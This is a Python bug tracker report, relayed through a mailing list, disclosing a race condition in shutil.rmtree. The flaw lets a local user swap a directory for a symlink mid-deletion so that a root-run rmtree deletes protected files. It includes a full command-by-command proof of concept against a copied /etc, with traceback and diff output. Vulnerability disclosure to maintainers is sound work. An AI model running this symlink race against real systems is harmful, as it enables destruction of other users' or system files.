New submission from Mart Sõmermaa <[EMAIL PROTECTED]>: Race condition in the rmtree function in the shutils module allows local users to delete arbitrary files and directories via a symlink attack.
See also http://bugs.debian.org/286922 Attack: --- # emulate removing /etc $ sudo cp -a /etc /root/etc/ $ sudo python2.6 >>> for i in xrange(0, 50000): ... with open("/root/etc/" + str(i), "w") as f: ... f.write("0") ... $ ls /root/etc > orig_list.txt $ mkdir /tmp/attack $ cp -a /root/etc/* /tmp/attack $ sudo python2.6 >>> from shutil import rmtree >>> rmtree('/tmp/attack') >>> # press ctrl-z to suspend execution ^Z [1]+ Stopped sudo python2.6 $ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack $ fg sudo python2.6 Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree onerror(os.rmdir, path, sys.exc_info()) File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree os.rmdir(path) OSError: [Errno 20] Not a directory: '/tmp/attack' $ ls /root/etc > new_list.txt $ diff -q orig_list.txt new_list.txt Files orig_list.txt and new_list.txt differ --- If the attack wasn't successful, /root/etc would not be modified and orig_list.txt and new_list.txt would be identical. ---------- components: Library (Lib) messages: 76753 nosy: mrts severity: normal status: open title: shutil.rmtree is vulnerable to a symlink attack type: security versions: Python 2.3, Python 2.4, Python 2.5, Python 2.6, Python 3.0 _______________________________________ Python tracker <[EMAIL PROTECTED]> <http://bugs.python.org/issue4489> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
